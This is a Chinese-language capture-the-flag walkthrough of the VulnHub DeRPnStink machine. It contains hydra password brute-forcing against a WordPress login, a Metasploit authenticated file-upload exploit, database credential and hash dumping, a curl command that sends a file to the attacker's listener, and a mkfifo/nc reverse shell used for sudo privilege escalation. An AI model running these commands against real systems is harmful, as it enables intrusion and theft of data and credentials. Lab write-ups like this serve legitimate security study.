vulnhub(11):derpnstink(hydra爆破用户名和密码、验证的文件上传)

端口

nmap主机发现
复制代码
nmap -sn 192.168.159.120/24
​
Nmap scan report for 192.168.159.120
Host is up (0.00020s latency).
​
120是新出现的机器,他就是靶机
nmap端口扫描
复制代码
nmap -Pn 192.168.159.120 -p- --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下
​
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh                                                                
80/tcp    open  http                                                                                                                  
 
发现开放3个端口
复制代码
nmap -sT -sC -sV -O -p21,22,80 -oA nmap/scan 192.168.159.120详细端口扫描:
-sT:完整tcp连接
-sC:默认脚本扫描
-sV:服务版本探测
-O:系统信息探测
​
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 124ef86e7b6cc6d87cd82977d10beb72 (DSA)
|   2048 72c51c5f817bdd1afb2e5967fea6912f (RSA)
|   256 06770f4b960a3a2c3bf08c2b57b597bc (ECDSA)
|_  256 28e8ed7c607f196ce3247931caab5d2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
​
​
分析:
21 ftp端口开放
80 web端口开放
22 ssh端口开放
复制代码
21端口匿名登录不上去
看80端口,主页面只有两张图片,我们看源代码页面:
敏感信息1:<script type="text/info" src="/webnotes/info.txt"></script>
敏感信息2:注释<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->

立足

复制代码
/webnotes/info.txt:
<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->
​
/webnotes:
[stinky@DeRPnStiNK /var/www/html ]$ whois derpnstink.local
   Domain Name: derpnstink.local
   Registry Domain ID: 2125161577_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.fakehosting.com
   Registrar URL: http://www.fakehosting.com
   Updated Date: 2017-11-12T16:13:16Z
   Creation Date: 2017-11-12T16:13:16Z
   Registry Expiry Date: 2017-11-12T16:13:16Z
   Registrar: fakehosting, LLC
   Registrar IANA ID: 1337
   Registrar Abuse Contact Email: stinky@derpnstink.local
   Registrar Abuse Contact Phone:
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
​
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
   
综合以上信息:
我们需要给ip绑定一个host头derpnstink.local,以便于后续正常访问服务
vim /etc/hosts
192.168.159.120         derpnstink.local
目录扫描
复制代码
gobuster dir -u http://derpnstink.local/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash
​
发现:
/weblog/              (Status: 200) [Size: 15172]
​
再扫一遍weblog目录,
gobuster dir -u http://derpnstink.local/weblog -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash 
:
/.html/               (Status: 403) [Size: 296]
/.php/                (Status: 403) [Size: 295]
/index.php/           (Status: 301) [Size: 0] [--> http://derpnstink.local/weblog/]
/wp-content/          (Status: 200) [Size: 0]
/wp-login.php/        (Status: 200) [Size: 2796]
/wp-includes/         (Status: 403) [Size: 302]
/wp-admin/            (Status: 302) [Size: 0] [--> http://derpnstink.local/weblog/wp-login.php?redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&reauth=1]
/xmlrpc.php/          (Status: 405) [Size: 42]
/.php/                (Status: 403) [Size: 295]
/.html/               (Status: 403) [Size: 296]
/wp-signup.php/       (Status: 302) [Size: 0] [--> http://derpnstink.local/weblog/wp-login.php?action=register]
​
显然是个博客,貌似还是wordpress,我的插件检测到了这就是wordpress,版本是4.6.29
wpscan扫描
复制代码
wpscan扫描一下:
wpscan --url http://derpnstink.local/weblog/ --api-token BQt8Nu27fqP76gJ44k9M5Z5AOuwQcc40k4YBs6lAUMY --disable-tls-checks
​
扫出了一个任意文件上传漏洞,其他的都是csrf或xss的跨站攻击
Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
这个漏洞我试了半天,当尝试msf利用此漏洞时,才发现他是需要验证的文件上传漏洞(Authenticated Arbitrary File Upload),也就是我们需要一个用户才能利用此漏洞
hydra爆破用户和密码
复制代码
我们使用hydra爆破wordpress有哪些用户:
hydra -p 123 -L /usr/share/wordlists/SecLists-master/Usernames/top-usernames-shortlist.txt derpnstink.local http-post-form "/weblog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&testcookie=1:Invalid"
​
解释一下:http-post-form表单数据是我提前用burp抓下来的,其中log=^USER^&pwd=^PASS^,分别是用户名密码及其占位符
Invalid表示回显中有“Invalid”字符串的结果不是我们想要的
​
抓到一个用户admin
​
我们使用hydra爆破admin的密码:
hydra -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top10000.txt -l admin derpnstink.local http-post-form "/weblog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&testcookie=1:incorrect|empty" 
​
成功爆破:
[80][http-post-form] host: derpnstink.local   login: admin   password: admin
验证的文件上传漏洞利用(CVE-2014-5460)
复制代码
https://nvd.nist.gov/vuln/detail/CVE-2014-5460
​
search slideshow
结果:
1  exploit/unix/webapp/wp_slideshowgallery_upload  2014-08-28       excellent  Yes    Wordpress SlideShow Gallery Authenticated File Upload
​
use 1
​
option这样设置:
Basic options:
  Name         Current Setting   Required  Description
  ----         ---------------   --------  -----------
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port]
                                           [...]
  RHOSTS       derpnstink.local  yes       The target host(s), see https://github.com/rapid7/metas
                                           ploit-framework/wiki/Using-Metasploit
  RPORT        80                yes       The target port (TCP)
  SSL          false             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /weblog           yes       The base path to the wordpress application
  VHOST                          no        HTTP server virtual host
  WP_PASSWORD  admin             yes       Valid password for the provided username
  WP_USER      admin             yes       A valid username
  
  run 一下直接getshell : www-data

提权

信息枚举
复制代码
还是之前配置错误信息收集,没什么敏感的,接下来尝试敏感文件收集
​
find /var/www -name *conf* 2>/dev/null 
/var/www/html/weblog/wp-config.php
/var/www/html/weblog/wp-includes/images/smilies/icon_confused.gif
/var/www/html/weblog/wp-content/plugins/akismet/views/config.php
/var/www/html/weblog/wp-config-sample.php
/var/www/html/weblog/wp-admin/setup-config.php
​
cat /var/www/html/weblog/wp-config.php 获取到数据库登录用户密码
​
define('DB_NAME', 'wordpress');                                                             
define('DB_USER', 'root');                                                                      
define('DB_PASSWORD', 'mysql');
​
mysql登录后一顿查,最后翻出来了:
+------------------+-------------------------------------------+                       
| User             | Password                                  |                       
+------------------+-------------------------------------------+                       
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                       
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                      
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                        
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                      
| debian-sys-maint | *B95758C76129F85E0D68CF79F38B66F156804E93 |                       
| unclestinky      | *9B776AFB479B31E8047026F1185E952DD1E530CB |                      
| phpmyadmin       | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 |          
+------------------+-------------------------------------------+ 
​
unclestinky $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/
​
cat /etc/passwd:看到unclestinky对应的用户是stinky
破解$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41:wedgie57 
su切换一下用户,成功了
​
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
​
我擦,flag2没找到直接到flag3了,算了等root后再说(虽然root后就懒得找了)
复制代码
简单配置错误信息枚举后,没有可利用配置错误提权,直接收集下敏感信息
/home/stinky/Documents下有:
-rw-r--r--  1 root   root   4391468 Nov 13  2017 derpissues.pcap
pcap是抓的数据包
是root创建的,非常可疑,直接考下来wireshark分析
复制代码
推荐一个很吊的脚本getfile.py,用于获取靶机上的文件
import http.server
import os
​
class SimpleHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        
        # 保存上传的文件
        with open("uploaded_file", 'wb') as f:
            f.write(post_data)
​
        # 返回成功响应
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'File uploaded successfully.')
​
if __name__ == "__main__":
    PORT = 8000
    server_address = ("", PORT)
    httpd = http.server.HTTPServer(server_address, SimpleHTTPRequestHandler)
    print(f"Serving on port {PORT}")
    httpd.serve_forever()
复制代码
攻击机器:python getfile.py后
​
直接再靶机上:curl -X POST --data-binary @./derpissues.pcap http://192.168.159.47:8000/
​
是不是非常方便,用不着scp那么麻烦,而且需要用户身份验证
简单分析获取mrderp用户密码
复制代码
登录后,sudo -l看一下
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
​
直接:echo "mkfifo /tmp/f;nc 192.168.159.47 1234 0</tmp/f|/bin/sh > /tmp/f 2>&1;rm /tmp/f" > /home/mrderp/binaries/derpy.sh
​
然后:
攻击机器:nc -nvlp 1234
靶机:sudo /home/mrderp/binaries/derpy.sh
获取到root权限
复制代码
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
补:flag2
复制代码
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
​
使用unclestinky用户登录wordpress后台管理页面,在Dashboard中看到
​
之前查数据库时候
+------------------+-------------------------------------------+                       
| User             | Password                                  |                       
+------------------+-------------------------------------------+                       
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                       
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                      
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                        
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                      
| debian-sys-maint | *B95758C76129F85E0D68CF79F38B66F156804E93 |                       
| unclestinky      | *9B776AFB479B31E8047026F1185E952DD1E530CB | <===========用来登录  wordpress                   
| phpmyadmin       | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 |          
+------------------+-------------------------------------------+ 
​
unclestinky $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41                 <======= 用来登录ssh
admin $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/
相关推荐
恩爸编程1 小时前
探索 Nginx:Web 世界的幕后英雄
运维·nginx·nginx反向代理·nginx是什么·nginx静态资源服务器·nginx服务器·nginx解决哪些问题
独行soc1 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍06-基于子查询的SQL注入(Subquery-Based SQL Injection)
数据库·sql·安全·web安全·漏洞挖掘·hw
Michaelwubo2 小时前
Docker dockerfile镜像编码 centos7
运维·docker·容器
远游客07132 小时前
centos stream 8下载安装遇到的坑
linux·服务器·centos
马甲是掉不了一点的<.<2 小时前
本地电脑使用命令行上传文件至远程服务器
linux·scp·cmd·远程文件上传
jingyu飞鸟2 小时前
centos-stream9系统安装docker
linux·docker·centos
好像是个likun2 小时前
使用docker拉取镜像很慢或者总是超时的问题
运维·docker·容器
超爱吃士力架3 小时前
邀请逻辑
java·linux·后端
独行soc3 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
LIKEYYLL4 小时前
GNU Octave:特性、使用案例、工具箱、环境与界面
服务器·gnu